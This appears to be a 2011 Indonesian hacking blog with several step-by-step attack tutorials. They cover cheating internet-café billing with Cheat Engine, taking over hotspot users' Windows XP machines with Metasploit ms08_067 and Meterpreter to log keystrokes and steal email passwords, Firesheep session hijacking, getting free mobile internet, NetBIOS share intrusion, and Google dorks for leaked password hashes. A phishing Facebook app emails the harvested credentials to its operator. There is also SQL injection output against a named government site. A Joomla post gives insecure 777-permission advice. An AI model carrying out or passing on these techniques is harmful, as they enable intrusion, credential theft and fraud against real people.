Follow Me

Latest Post

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

cara memperlambat waktu billing warnet

Written By Dejan on Sunday, November 13, 2011 | 9:36 PM

ni make CE nah bagi yg belum punya CE ( Cheat Engine ) silahkan DL dari link dibawah ini, terserah mau versi yg berapa. tp kalo bisa yg 5.5 atau klik ni ja bwtdownload
1. Cari Net

2. Main 1 Jam

3. Install CE.y

4. Buka CE

5. Attach / Target ke Program Billingnya

6. Set Speedhack 0.1

NB:
1.bwat no 7 kalo speedhacknya diatur berapa jadi berapa jam, tabelnya dibawah ini
[spoiler]

TABEL SPEEDHACK
0.1=1jam jadi 10 jam
0.2=1jam jadi 5 jam
0.3=1jam jadi 3.33jam
0.4=1jam jadi 2.5 jam
0.5=1jam jadi 2 jam
0.6=1jam jadi 1.66jam
0.7=1jam jadi 1.42jam
0.8=1jam jadi 1.25jam
0.9=1jam jadi 1.11jam
1.0=1jam jadi ya 1jam

2.yg pake deepfreeze di undeepfreeze dulu cari aja di paman google

kalo dah puas jadiin 7.0/brp yg gede supaya cepet selese
nah bayar kaya biasanya dah...
inget warnet orang jangan di bikin rugi...

saran:
mending make di warnet yang jumlah komput n pengunjungnya banyak, yar gag di curigain...

cara pasang keylogger ala hacker

Written By Dejan on Saturday, November 12, 2011 | 2:20 AM

ASSALAMUALAIKUM SOBAT????
semoga hari ini sehat semua.amin
kali ini team hacker akan membahas tentang keyyloger.
namun cara pasang nya sangat berbeda lho.
apa itu keylogger??
keylogger adalah sebuah tools yang dirancang
untuk merekam aktifitas keyboard pada suatu komputer.
untuk memasang keylogger biasanya mesti di install di komputer
korban tersebut.
ehm kayaknya sangat sulit sob kalo harus instal di warnet2 ato hotspotan kan?
kalo di warnet ada tools deepfreze so pasti akan hilang jika kita install di warnet.
nah kalo mau pasang keylogger di hotspotan kan kaga mungkin kita harus minta laptop sang
korban buat install tools ini.ada kita kena gebukin massa,wkwkwkw

so jangan kuatir masih banyak jalan menuju roma sob.
nok mari simak cara jitu buat masang keylogger tanpa harus
install di komputer korban.

Peralatannya adalah :

Angry IP Scanner (Buat scanning ipaddress)

Nmap (Buat nyecan Port2 yg kebuka n nyecen OS korban sekalian)

Metasploit (Sangat penting buat exploitnya dan dapat meretas semua kegiatan korban)
bagi member blog kami tidak hanya masalah exploit keylogger saja.akan ada pelatihan yang lain mengenai tools ini.yang belum member silahkan daftar DISINI
dan yang ingin sekedar tahu silahkan download di situs resminya.

1. Pertama buka angryipscanner, pilih netmasknya yg 24 ajee,,pokoknya disesuain aja sama lokasinya dimana,,hahhaha,,kalo sekedar hostpot area area doang yg model model kayak di mol mol mah 24 ajeee...lalu liat ipaddress kita dilaptop kita..dan lakukan scanning dari 0 s/d 255, maka akan muncul gambar kayak gini :





nah gambar diatas itu yg warna biru berati komputernya lagi idup alias lagi nyala.

2. Buka nmap dan lakukan scanning port dan OS korban dengan perintah sudo nmap -O ipkorban, seperti gambar berikut:



port nya keliatan ama tu system operasi windows nya ternyata si korban pake windows xp toh.
wkwkkwkwkwk

3. Mulailah exploit, buka applikasinya msfgui,,tekan keyboard Alt+F2 dan ketik ?msfgui? setelah kebuka dan Start, pilih ?ms08_067_netapi? di Exploit>windows>smb> , seperti gambar berikut ini:



4. Maka akan keluar jendela pilihan OS targetnya, pilihlah ?Automatic Targeting?, seperti gambar berikut ini:



5. Lalu scrool kebawah dan pilih ?Meterpreter>bind_tcp? , seperti gambar berikut ini:



6. Lalu scrool kebawah lagi dan masukan ipaddress target di kolom ?RHOST? , seperti gambar berikut ini:



Lalu scrool ke paling bawah ada tombol, Exploit, tekan aja ituh,,,

7. Maka akan keluar jendela seperti ini di tab ?Session?, seperti gambar dibawah ini:



8. Lalu klik kanan itu dan pilih Monitor>Start KeyLogger, seperti gambar dibawah ini:



9. Maka akan keluar path tempat penyimpanan log nya berupa format ?txt? dikomputer kita, seperti gambar berikut ini:



coba perhatikan yg Keystrokes being saved to bla bla bla,,itu adalah nama path lokasi penyimpanan lognya dikomputer pinguin kita. dan liat bacaan Recording,,itu berati ketukan keyboard korban sudah mulai di rekam oleh metasploit kita..hhehehe..Saatnya kita tungguin ajaaa dah,,setelah lama, kita tunggu, n udah gak sabar, setelah beberapa menit kita buka ajjeee tuh filenya, seperti gambar berikut ini:



10. Udah gak sabar nih, langsung aja buka,,lalu lakukan searching dengan menekan tombol Ctrl+F dengan memasukkan kata2 kunci yg biasanya bau bau enak, seperti yahoo.com, yahoo.co.id, gmail.com , ymail.com, com, dll, maka akan keluar Insya Allah kayak gini sob:



OK kelar deh,,ya kan bener kan gak perlu mondar mandir nyentuh komputer korbannya buat ngedapetin sesuatu yg ente mau,,,hhhwhwhhw,,pake metasploit lebih sloooowww,,sambil ngopi+ngeroko filter juga OK,,gak perlu tergesah gesah dengan tampang pucat ,OK lah kalo bgitu ane pamitan dulu, n tunggu exploit-exploit berikutnya dari kami....WASSALAM MUALAIKUM WR,WB

Hacking Facebook, Twitter, etc Account

Written By Dejan on Friday, November 4, 2011 | 12:20 AM

cara hacking facebook yang akan saya tulis ini adalah dengan menggunakan
addons FIRESHEEP. Firesheep merupakan add-on firefox yang bisa
digunakan untuk hacking facebook. Firesheep ini buatan Eric Butler,
seorang freelance web aplikasi dan pengembang perangkat lunak.
Sebenarnya firesheep ini bertujuan untuk mengantisipasi kurangnya
keamanan user login dan cookie pada web-web populer seperti facebook.
Sebenarnya Firesheep bukan hanya digunakan untuk facebook saja tapi
banyak website populer lainnya seperti cookies dari Amazon.com,
Basecamp, bit.ly, Cisco, CNET, Dropbox, Enom, Evernote, Flickr, Github,
Google, HackerNews, Harvest, Windows Live, NY Times, Pivotal Tracker,
Slicehost, tumblr, Twitter, WordPress, Yahoo, Yelp

Firesheep ini merupakan software opensource yang bisa anda download dihttp://codebutler.github.com/firesheep/
dan jangan lupa bagi anda pengguna windows untuk memasang winpcap
terlebih dahulu. Setelah anda mendownload dan menginstall firesheep dan
anda sedang berselancar ria di jaringan wifi yang gratis misalnya di
cafe. maka akan muncul sebuah sidebar baru yang menampilkan user-user
yang sedang login ke sebuah web sebagai contoh adalah Facebook. Jika
pengguna wifi ada yang login ke facebook dan tampil di sidebar anda,
maka anda hanya butuh mengklik 2 kali dan anda sekarang bisa login
sebagai dia tanpa harus memasukkan username dan password lagi.

Untuk cara menggunakan firesheep, tinggal tekan Ctrl + Shift + S pada
keyboard. maka secara otomatis akan muncul Sidebar di firefox anda.
Kemudian klik tombol Start Capturing. Jika berhasil, maka akan muncul
beberapa facebook orang-orang yang sedang online di kawasan hotspot
anda.

untuk mengantisipasinya tinggal kita gunakan backsheep..
kebalikan dari firesheep fungsinya.. silahkan di mengerti 

dengan adanya tutorial ini semoga muncul kesadaran bahwa sebenarnya
hacking itu luas dan yang terpenting adalah proses dan ilmu yang kalian
dapatkan.. majulah "undergrond" Indonesia dan majulah IT indonesia 

sekian dari saya, 

Trik Bobol Smartfren internet unlimited

Written By Dejan on Thursday, November 3, 2011 | 12:54 AM

pertama kita dial dulu modem sob pake kartu smart dan coba aja ke chome or firefox, lalu ketikkan:smartfren.com@url:google.comdan coba liat halaman pencarian google kebuka... jd ada vuln disitu. yuk kita gabungin pake proxy....
ne software yg akn kita butuhkan adalah ispce.

langsung saja!

1. Install program ispce td, trus buka, beri centang pada query mode, dan kita atur listen portx 127 biar gampang nantinya. klik OK.



2. Coz domain yg hanya bisa diakses saat pulsa smart sob habis "nol" adalh smartfren.com, smart-telecom.co.id, dan jump.smart-telecom.co.id, jadi masuklah pd Query URL Configuration, pilih front query, trus masukkan salah satu domain tsb pd font query + simbol "@".



3. Kita beralih pd proxy configuration, unk proxy server silahkan cari sendiri, dgn catatan proxy dgn port 80 dan 3128 yg hanya bisa dgunakan disini, coz pihak smartfren mungkin hanya membuka kedua port tsb. unk proxy cari di google sendiri ea ato ke hidemyass.com banyak koq.. cari yang fast proxy, biar liar larinyaaa,,, hehehehhe
Ato kalo gak pengen repot pake aja ne proxy, tp gak ane jamin, lemoootnya ampuuunnn..!!



4. Udahan dulu, klik REFRESH 3x, lalu minimize, jangan di-exit!!
next...
buka firefox. ke menu Options - Advanced - Network - Setting. Atur http proxy 127.0.0.1, dan gunakan listen portx yg tadi yaitu 127., berikan centang pd use this proxy.........
kemudian kosongkan pd No proxy for.




Nikmatin deh Gratisannya... 

Hacking Joomla! dan penangananya

Written By Dejan on Monday, October 31, 2011 | 10:06 PM



Beberapa waktu yang lalu ada keluhan dari seorang teman, yang menyatakan bahwa situsnya terkena serangan. Sang teman menggunakan CMS Joomla! sebagai engine web yang dimilikinya. Saya cek di TKP ternyata benar, halaman utama dan administratornya telah berganti wajah (defaced). Pertanyaanya adalah mengapa hal ini terjadi?


Sebenarnya saya cukup dibuat gusar oleh sang teman. Alasanya karena dia mencurigai saya terus-menerus sebagai dalang perusak situsnya. Loh kok?..saya juga bingung dengan hal tersebut. Saya beranggapan dia mencurigai saya karena mencoba bersaing secara tidak sehat. Aneh juga sih... ntahlah, mungkin dia menggunakan Blog saya sebagai alibi. Toh blog saya lahir semenjak 3 tahun yang lalu sebagai media sharing pengalaman saja. Jadi kalau dia mengganggap Blogger = Cracker, mungkin ada benarnya juga. Masih untung ada Cracker yang mau berbagi ilmu dengan menjadi Blogger. Satu lagi, jangan singgung masalah mental Blogger dong. Risih saya mendengarnya. Tidak ada aturan khusus di negara ini mengenai konten blog apa yang boleh atau tidak. Asalkan konten tidak berbau pornografi dan SARA semua boleh-boleh saja. Saya juga bukan tipe perusak seperti yang dianggap. Walaupun untuk memposting sebuah artikel saya harus melakukan percobaan terlebih dahulu. Sekali lagi Blogger tetap Blogger, Cracker tetap Cracker atau bisa keduanya Cracker merangkap sebagai Blogger.



Okey kembali ke pengakuan. Meskipun saya sedikit tahu teknik defaced web denganSQL Injection atau XSS (cross site scripting)Sumpah..Bukan saya pelakunya!. Di luar sana bergentayangan dedemit maya ratusan jumlahnya dengan trisula di tanganya . Kalau anda seorang admin web, tentunya anda dapat melacak jejak sang pembongkar dari LOG yang disediakan oleh server. Cara mudahnya anda juga bisa MERESTORE ke tanggal yang lebih lama, dan langsung bisa sehat. Ngapain harus upload ulang dengan domain dan web hosting baru. Suatu tindakan membuang duit saja menurut saya. Kecuali kalo server yang anda gunakan tidak menyediakan fasilitas BACKUP harian. Kalau begitu salahkan admin servernya dong.

Mengapa di HACK?
Bukan itu pertanyaan yang tepat. Kalau itu yang anda tanyakan, jawabanya akan sangat panjang. Pertanyaan yang tepat adalah, "Bagaimana bisa diHack?...Okey saya jelaskan sebatas kemanpuan saya.
Anda tahu dengan CRAWLER? itu adalah hewan peliharaan tuan GOOGLE. Dia adalah Laba-laba mesin raksasa yang tugasnya menjaring informasi website yang ada di dunia. Kehebatanya jangan diragukan. Kalau anda meragukan berarti anda juga meragukan Google sebagai mesin pencari no.1 di dunia. Spidernya Google ini dapat menangkap informasi sebuah website paling lama 7 hari kerja.
Lantas apa hubunganya? Sama seperti jarak matahari dengan bumi yang 10 menit. Website anda akan terdeteksi dengan baik oleh Link Scanner setelah 7 hari diaktifkan. Istilahnya Google Hacking. Silakan cara referensi Google Hacking di Internet. Intinya para hacker memanfaatkan Google sebagai Link Scanner situs- situs mana yang memiliki celah. Hanya dalam 7 hari. (seperti iklan produk kecantikan aja, he..he). Jadi jangan salahkan saya hanya karena saya yang tahu informasi website anda sebelumnya. Website anda sudah tayang 7 hari bukan?. Feuh....payah.

Kembali ke permasalahan. Joomla! merupakan CMS populer yang paling banyak digunakan oleh pengguna website, termasuk saya. Keunggulan Joomla tidak perlu dijelaskan lagi. Silakan datang ke toko buku di kota anda dan pilih sendiri puluhan judul buku yang membahas Joomla!.

Karena Joomla! banyak digunakan, jadi sudah pasti CMS ini jadi sasaran bulan- bulanan oleh para cracker. Berikut ini beberapa tips pengalaman saya menggunakan Joomla! dan teknik mengamankanya:

1. Update Continues
Sama seperti anti virus di komputer, Joomla! juga memerlukan update secara rutin. Terlambat sedikit saja tidak mengundape Core Joomla!, silakan tunggu saja serangan ke website anda.
Kapan kita melakukan Update?
Tidak seperti anti virus yang dapat langsung melakukan update jika kondisi dalam keadaan kritis. Joomla! harus diupdate secara manual.
Kapan waktu yang tepat?
Yang jelas ketika ada informasi celah keamanan pada versi Joomla! yang kita gunakan. Untuk lebih mudahnya anda bisa berlangganan RSS Feed melalui e-mail issue keamanan Joomla! di Joomla! Security Announcements. Jika terdapat celah keamanan pada sistem joomla!, maka akan ada informasi yang dikirimkan melalui e- mail untuk segera melakukan patching.
Beberapa orang mungkin masih bingung cara menginstal Joomla! Patch Package. Caranya adalah dengan menggunakan FTP Client misalnya FileZilla. Silakan cari di Google softwarenya dan caranya. Atau kirim e-mail ke saya, nanti saya jelaskan melalui chat.

2. No Hole
artinya?... tau ah, istilah saya aja itu. Jika anda pengguna web hosting pemula biasanya masih bingung dengan istilah ini. Pada direktori web hosting ada istilah folder access bukan? nah itu dia..Jadi pastikan direktory access pada posisi 775 atau 777 pada setiap folder. Kalau masih bingung tanyakan aja deh ke admin supportnya web hosting atau baca di manualnya deh.
....(saya menulis artikel ini sedang tidak didepan server dan dalam kondisi buru- buru, makanya tidak bisa detail, maaf ya)

3. Gunakan plugin jSecure
Plugin yang satu ini saya akui kehebatanya. Dengan plugin ini anda bisa mengganti URL halaman administrator default ke URL khusus. Tahukan, halaman administrator joomla dapat diakses di http://sitename.com/administrator. Plugin jSecure akan memindahkan alamat admin tersebut ke dalam bentuk http://sitename.com/administrator/?keyname. Keyname dapat anda buat sendiri sesuka hati.
Jadi dengan plugin ini anda bisa melindungi halaman login administrator. Lebih aman bukan?
4. Hati-hati menginstal Componen, Module dan Plugin
Serangan Joomla tidak hanya dilakukan melalui Core Joomla!. Sebagian besar justru melalui komponen, module, plugin atau templatenya. Jadi pastikan sebelum memilih module, komponen dan plugin, pastikan sumber websitenya jelas dan memiliki rating pengguna yang banyak serta tidak banyak keluhan.
Mudahnya, cari langsung dari sumbernya di Joomla! Ekstention. Kemudian baca reviewnya dan pastikan kondisinya aman.

5. Template premium tapi warez
Kehebatan Joomla! salah satunya adalah adanya beragam template menarik yang siap diunduh dimana saja. Template menarik pastinya yang premium. Namun anda harus menebusnya dengan cara membeli. Atau cara klasik lama dengan mencarinya di situs warez atau filesharing. Disana terdapat ratusan template premium siap unduh dan siap pakai.
Pertanyaanya apakan aman digunakan?
Saya jawab aman jika anda tahu menggunakannya. Namun sangat tidak aman jika langsung memakainya mentah- mantah.
Mengapa?
Template premium biasanya langsung berisi core, komponen, module dan plugin siap pakai dalam paket template yang disertakan. Enak sih, karena langsung jadi tinggal ganti artikel saja. Sayangnya hampir seluruh komponen yang disertakan dalam versi jadul. Kalau versi jadul digunakan sudah pasti mudah diserang toh?... anak kecil aja tahu jawabanya.
Jadi kalau anda menggunakan template premium abal-abal, pastikan juga anda menpacth core, komponen, module dan plugin yang disertakan di dalamnya. Cukup repot bahkan kemungkinan crashnya tinggi. Namun gimana lagi. Daripada setelah dipasang seminggu langsung diserang! iya ngga?
6. Ngumpul di Komunitas Joomla
Anda tak akan pintar tanpa bantuan orang lain. Oleh karena itu, untuk mempercepat wawasan anda tentang Joomla! silakan gabung di komunitas Joomla!. Cek di Joomla! ID

Wokeh... cukup panjang penjelasan saya. Kalau begitu sata akhiri saja deh. Namun sebelumnya saya tambahkan lagi beberapa catatan kecil sebagai pemertegas:

Pertama saya bukan tukang deface situs. Jadi jangan lagi menuduh saya yang melakukanya, apalagi berkoar-koar meminta dukungan di jejaring sosial. Takutnya saya nanti jadi terkenal, wkwkwk.
Kedua jangan salahkan Blog saya, karena melalui blog inilah saya masih menjadi orang baik yang mau membagikan segelintir ilmu yang saya peroleh dengan cucuran keringat.
Ketiga banyaklah belajar termasuk belajar dari pengalaman. Saya bukan tidak pernah kena defaces, bahkan hampir tiga kali web saya pernah kena defaces. Bedanya saya memperbaikinya dengan kepala dingin, tidak menuduh apalagi mempropagandakan dengan orang banyak. Nampak sekali bodohnya kita, sudah jatuh cerita pula..wkwkwk
Keempat saya mohon maaf jika ocehan saya di atas tidak berkenan dengan hati pembaca. Saya hanya manusia biasa yang masih harus banyak belajar dan saling melengkapi. Tapi kalau tidak dimaafkan, mungkin waktu dan pengalaman akan menjelaskanya sendiri.

Maju terus teknologi informasi Indonesia

Remote Komputer Dengan Telnet

Written By Dejan on Wednesday, October 26, 2011 | 5:12 AM

Apa itu Telnet? Telnet (Telecommunication Network) adalah protokol jaringan yang digunakan untuk mengkoneksikan / menghubungkan beberapa komputer dalam satu jaringan. Telnet ini biasanya dijalankan di Command Prompt, interface yang digunakan adalah Command Line Interface (Text Base). Disini saya akan menjelaskan bagaimana mengaktifkan Telnet dan perintah dasar Telnet pada Windows Command Prompt (CMD) di Windows 7. Komputer yang saya Telnet menggunakan Windows XP.
Perintah-perintah dasar pada Command Prompt (CMD) harus mutlak kita ketahui, karena banyak menggunakan perintah dasar CMD untuk menelusuri isi dari komputer yang kita remote. Langkah-lahkahnya sebagai berikut:
  • Di windows ktifkan service Telnet. Dari Start --> Control Panel.
  • Pada pilihan View by, pilih Category.
  • Pilih icon Programs.
  • Pilih Turn Windows features on or off.
  • Cek list Telnet Client.
  • Pilih OK, maka proses fitur untuk Telnet akan di aktifkan, tunggu beberapa saat.
  • Untuk memastikan apakah Telnet kita sudah aktif silahkan cek di Command Prompt (CMD) dan ketikkan perintah Telnet. Jika ada tampilan seperti gambar di bawah berarti Service Telnet Client sudah aktif. Untuk keluar ketikkan quit
Pada Windows XP secara default di Command Prompt perintah Telnet bisa digunakan. Jika kita meremote komputer Windows XP dari komputer lain kita tidak bisa mengakses full. Supaya komputer lain bisa mengakses full kita harus mengaktifkan service Telnet pada Windows XP.
Langkah-langkahnya sebagai berikut:
  • Klik Start > Control Panel.
  • Pilih Administrative Tools.
  • Kemudian pilih icon Services
  • Pilih service Telnet. Secara default Startup Type untuk Telnet bernilai Disable. Jika di remote dari komputer lain tidak memberikan full akses. Disini kita mengubah nilai menjadi Automatic.
  • Klik 2 kali Telnet, kemudian ganti Startup Type menjadi Automatic. Klik tombol Apply > Start > OK
Settingan sudah selesai, kini saatnya kita meremote Windows XP dari Windows 7.
  • Di Windows 7 (dengan IP Address 192.168.1.10) buka Command Prompt (CMD), kemudian ketikkan perintah telnet
  • Kemudian akan muncul tampilan Welcome to Microsoft Telnet Client.
  • Pada windows XP yang akan diremote menggunakan telnet, sudah diset IP Addressnya, yaitu: 192.168.1.11, yang tentunya sudah terkoneksi dengan Windows 7. Untuk uji koneksi silahkan buka Command Prompt (CMD) baru kemudian lakukan ping ke IP komputer yang akan di remote atau sebaliknya. Jika belum ada replay silahkan perbaiki.
  • Di Windows 7, Ketikkan perintah open 192.168.1.11.  kemudian akan ditanyakan Do You want to send any way? jawab ya denga menekan tombol Y dan kemudian tekan Enter.
  • Setelah itu minta login user pada windows XP. Ketikkan Administrator dan password.
  • Akhirnya selesai juga. Jika berhasil tampilannya akan seperti dibawah ini. Disini kita bisa melihat, edit, menghapus, dan sebagainya.
Semoga bermanfaat   ^_^.

Remote komputer dengan Netbios Hacking

 
 
 
 
 
 
i
 
1 Vote
Quantcast
Hacking menggunakan metode Netbios atau lebih dikenal dengan Netbios Hacking merupakan teknik hacking klasik yang bisa kita pelajari dan tidak salah untuk dipraktekkan. Hacking Netbios cocok diterapkan pada jaringan LAN, semisal warnet atau jaringan kantor.
Hal utama yang dibutuhkan dalam Netbios Hacking adalah IP Address. Ada berbagai tools dan sofware yang dapat digunakan untuk menscan IP Address yang sedang aktif pada jaringan lokal, misalnya Look at Lan, IP Scanner, dll. Pelajari penggunaanya disini.  Langkah-langkah Netbios Hacking :
  1. Buka command Prompt, atau pada run ketik cmd kemudian enter.
  2. Pada command prompt ketik netview \\ip_address, misalnya C:\>net view \\192.168.1.1
Jika tidak ada pesan error yang ditampilkan, coba dengan IP Address yang berbeda. Jika sukses tidak ada pesan error, lanjutkan dengan perintah yang lain dibawah ini.
C:\>net use C:\\192.168.1.100
C:\>net use D:\\192.168.1.100\SharedDocs
C:\>net use F:\\192.168.1.100\Myprint
Pada contoh-contoh di atas menunjukan beberapa perintah yang biasa digunakan. C:,D:, dan F: adalah drive yang biasa terdapat di komputer. Perintah pertama bertujuan untuk mengakses drive C. Perintah kedua (SharedDocs) digunakan untuk mengakses Dokumen yang di sharing sedangkan perintah ketiga (Myprint) dipakai untuk mengakses printer komputer yang akan diremote.
Jika tampil pesan “The commad completed successfully”, berarti perintah yang dilakukan berhasil meremote komputer korban. Langkah selanjutnya tinggal mengobrak-abrik komputer korban, mencopy, menghapus data, memasukan virus, spyware, trojan atau keylogger.
Menarik bukan?… Hacking netbios dapat dijadikan awal kita memulai aktifitas hacking di jaringan. wew….
Catatan: Hacking netbios yang dapat dijalankan pada komputer yang tidak terlindungi oleh Firewall. Jadi jika Firewall komputer diaktifkan maka akan tampil pesan error. Stop dan coba dengan IP Address yang berbeda.
Selamat mencoba

SQL Injection Vulnerability on DEPKES.GO.ID

Analyzing http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21
Host IP: 202.70.136.4
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
Keyword Found: Pedoman
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 6
Finding string column
Valid String Column is 2
Target Vulnerable :D
Current DB: portal
Count(table_name) of information_schema.tables Where table_schema=0x706F7274616C is 89
Tables found: jos_assignments,jos_banner,jos_bannerclient,jos_bannertrack,jos_categories,
jos_components,jos_contact_details,jos_content,jos_content_frontpage,
jos_content_rating,jos_core_acl_aro,jos_core_acl_aro_groups,
jos_core_acl_aro_map,jos_core_acl_aro_sections,jos_core_acl_groups_aro_map,
jos_core_log_items,jos_core_log_searches,jos_downloads,jos_downloads_blob,
jos_downloads_category,jos_downloads_classify,jos_downloads_containers,
jos_downloads_file_classify,jos_downloads_files,jos_downloads_folders,
jos_downloads_log,jos_downloads_repository,jos_downloads_reviews,
jos_downloads_structure,jos_downloads_text,jos_groups,jos_hwdvidsantileech,
jos_hwdvidscategories,jos_hwdvidsfavorites,jos_hwdvidsflagged_groups,
jos_hwdvidsflagged_videos,jos_hwdvidsgroup_membership,jos_hwdvidsgroup_videos,
jos_hwdvidsgroups,jos_hwdvidsgs,jos_hwdvidslogs_archive,
jos_hwdvidslogs_favours,jos_hwdvidslogs_views,jos_hwdvidslogs_votes,
jos_hwdvidsplugin,jos_hwdvidsrating,jos_hwdvidsss,jos_hwdvidsvideos,
jos_jdownloads_cats,jos_jdownloads_config,jos_jdown

Hack Email Accounts Using Google

Ngga Sengaja pas buka2 artikel lama nemu beberapa bahasan yg asyik n msh bisa digunakan, yap..artikel kali ini berhubungan dengan hack email, walaupun udah kesimpen setahun yang lalu ternyata masih ampuh loh..
Today im gonna show you how to hack email accounts using some special google dorks,remember google is our friend :)

Google Dorks:


Code:

ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e


Code:

ext:sql intext:"INSERT INTO" intext:@hotmail.com intext:password


Code:

ext:sql intext:@hotmail.com intext:password

Ok..let begin
pi3

Pilih salah satu yang mengandung n berbau email
pic1
Pilih salah satu dan lsg taruh di hash cracker utk mendapatkan password email.
terlihat pass email adalah: Fireworks
pic2

Use this my favorite hash cracking
1. Hash Online #1

2. Hash Online #2


DONE :)

Remember, hacking email will not make you become a hacker
Just be what you are, Not what they are

Hacking Akun Facebook Via Facebook

Facebook, sapa sih yang gak kenal Facebook??? Salah satu situs jejaring sosial terbesar selain Friendster dan Twitter. Facebook dikenal karena kemudahan dan tentunya keamanannya.

Aman?? 100%?? hem..tidak ada yang sempurna.. banyak para hacker yang berusaha menembus pertahanan Facebook, seperti yang dilakukan team inj3ct0r yang menggunakan tehnik SQL pada salah satu Apps yang ada di Faceboook. Tehnik lain?? hem..saat ini lebih banyak menggunakan Social Enginering seperti tehnik Pishing,Poisoning Attack pada satu jaringan,Fake Login dll.

Disini saya akan membahas salah satu tehnik Social Enginering yaaa semacam fake login tapi menggunakan fasilitas Facebook itu sendiri.Maksudnya??maksudnya adalah kita membuat halaman palsu berupa apps di dalam Facebook tersebut.
Tata cara nya sebagai berikut:

1. Download scriptnya dulu http://www.mediafire.com/?448qgmyux5o2mb8 atau http://idws.us/jjfjdc
2. Cari server gratisan atau injekkan yang support .PHP ( tanya om Google ) atau .ASP ( http://www.jabry.net )
3. Facebook tentunya
Mulai pembuatannya deh :
Sudah disiapkan scriptnya?? kalau sudah, ubahlah di bagian yang saya tandai menjadi alamat e-mail anda

.PHP  Code:
mail(
"youremailaddress@domain.com",

.ASP Code:
Mailer.RemoteHost = "smtp.yourhost.com"
Mailer.AddRecipient "your name", "youremailaddress@host.com"
lalu upload ke server anda..dan tugas pertama kita selesai. :)

[Image: 
sshot6j.jpg]
Lalu masuk ke http://www.facebook.com/pages/create dan pilih "Perjuangan atau Komunitas" lalu masukkan nama halaman anda.
Disini dituntut kepandaian kita mengolah kata agar berkesan menarik. Contoh "Cek Kepopuleran FB Anda" dan selesaikan langkah yang di anjurkan.
Kalau udah punya Logo buat halaman kita lebih bagus lagi sekalian kita upload disana. Kalau udah di kolom "Alamat Web" kita isi http://www.facebook.com/ lalu selesai deh.
Saatnya kita masuk ke http://www.facebook.com/add.php?api_key=...1e44&pages dan kita pilih "aplikasi" lalu kita pilih "Go To Apps" dan masukkan kode FBML yang sudah didownload tadi.
Jangan lupa di bagian yang bertuliskan "http://yourwebsite.com/facebook.php" diganti Url tempat kita mengupload file Facebook.php tadi...dan klik "Save". selesai sudah tugas ke 2 kita. Lihat gambar dibawah ini

[Image: 
sshot7y.jpg]
Terakhir, kita share halaman yang udah kita buat tadi, lalu minta teman - teman kita buat meng-klik tombol "Like" usahakan minimal 25 orang yang nge-like. Jadi kita bisa membuat "username" untuk halaman kita, misal jadi "http://www.facebook.com/pagechecker" dan berharap orang-orang mencoba aplikasi kita, lalu boom..panen password deh....cek folder spam di server e-mail kita.

Kalau mau liat hasilnya ni ada halaman demonya,tapi jangan coba-coba masukkin password asli ya..he he he
DEMO
http://www.facebook.com/pages/Cek-Harga-...4949752878
tampilan kalau ada yang coba nih halaman kaya gini..

[Image: 
sshot3e.jpg]
[Image: 
sshot4g.jpg]
Dan hasilnya akan terekam dengan baik di e-mail yang udah kita setting tadi...he he he

[Image: 
sshot5e.jpg]

Google Hacking Part 1

Written By Dejan on Monday, October 24, 2011 | 11:23 PM

Satu lagi tulisan gue yang membahas mengenai HACKING. Setelah sekian lama beku tidak mencairkan ide baru. Hampir lebih dari 2 minggu semenjak tulisan yang terakhir. Huh Capede...
Yup langsung ke intinya. Bagi pengguna setia yang terbiasa dengan urusan ngenet pasti sudah hafal 100% dengan GOOGLE. Mesin pencari nomor 1 yang banyak digunakan untuk ngacak2 data.
Layaknya mata dan tangan yang mencari jarum di tumpukan jerami, dibutuhkan teknik khusus dan pemahaman dasar yang kuat untuk mencari mahluk yang namanya "DATA". Orang bego yang tidak memahami teknik pencarian Google sama persisnya dengan orang yang bego tersesat di kota mencari alamat tapi tidak mengetahui mengggunakan peta. Alhasil setiap rumah akan ditanya satu-satu dan bisa dibayangkan jika dia tersesat di kota sebesar jakarta. Capede...
Teknik pencarian Google memang wajib diketahui oleh semua pengguna internet, terutama bagi yang haus akan data. Tidak sedikit orang yang bergelut di bidang IT tidak mengetahui teknik pencarian data di Google. Ga percaya?...survey aja! atau jangan2 kamu sendiri juga..he3x.
Berikut sedikit tips yang mungkin berharga dan perlu di coba, Selamat membaca!.

Tips pertama. Ketik kata terpenting di awal kalimat
Google tidak case sensitive. Artinya kata apapun yang kamu ketik, huruf besar, kecil ataupun gabungan tidak akan mempengaruhi hasil pencarian. Misalnya keyword: hacking = HACKING = Hacking, akan menghasilkan data pencarian yang sama. Oleh karena itu jangan terlalu ambil pusing dengan apa yang kamu ketik yang penting tulisanya benar.
Usahakan jika pencarian frase kata/kalimat secara langsung, ketik kata kunci di awal-awal kalimat. Kata yang tidak penting seperti di, yang, pada, suatu, sebuah, dll tidak perlu diketikan.
Misalnya pencarian: "Modul pembelajaran teknik informatika untuk SMK"
Ketik di google : download modul smk informatika teknik

Tips kedua. Gunakan tanda "+" atau "-" untuk mengeliminasi kata
Hasil pencarian dengan hanya dua atau tiga kata akan menghasilkan pencarian yang tidak akurat. Untuk mencegah hasil pencarian tidak lari kemana-mana gunakan tanda + atau - untuk mengeliminasi kata yang tidak diinginkan.
Misalnya pencarian : Hacking deface tanpa cracker
Ketik di google : hacking +deface -cracker

Tips ketiga. Gunakan "..." untuk pencarian kalimat secara utuh
Hasil pencarian yang hanya mengetikan kalimat atau kata, Google akan mencari hasilnya perkata. Tentu saja hasilnya tidak akurat bukan. Untuk itu gunakan tanda "..." diantara dua atau tiga kata yang tidak bisa dipisahkan.
Misalnya pencarian: Motivasi belajar siswa
ketik di google: "motivasi belajar siswa"
Google akan mencari ketiga kata tersebut secara utuh tanpa dipisahkan.

Tips keempat. Gunakan site:nama situs, jika kita telah tahu datanya dalam sebuah situs tertentu
Jika data yang hendak kita cari sudah pasti berada pada situs tertentu, hasil pencarian akan lebih rinci jika kita gunakan site:nama_situs, artinya kita hanya akan mencari di dalam situs tersebut.
Misalnya pencarian : objek mutu SMK di situs http://ditpsmk.net
ketik di google : site:ditpsmk.net objek mutu smk

Tips kelima. Gunakan filetype:..., untuk pencari data dalam bentuk file
Adakalanya data yang kita cari akan lebih enak langsung di download dalam bentuk file yang sudah umum misalnya berformat .pdf atau .doc. Oleh karena itu gunakan filetype:pdf | filetype:doc kedalam pencarian.
Misalnya pencarian: Motivasi belajar
Ketik di google: filetype:pdf | filetype:doc motivasi belajar
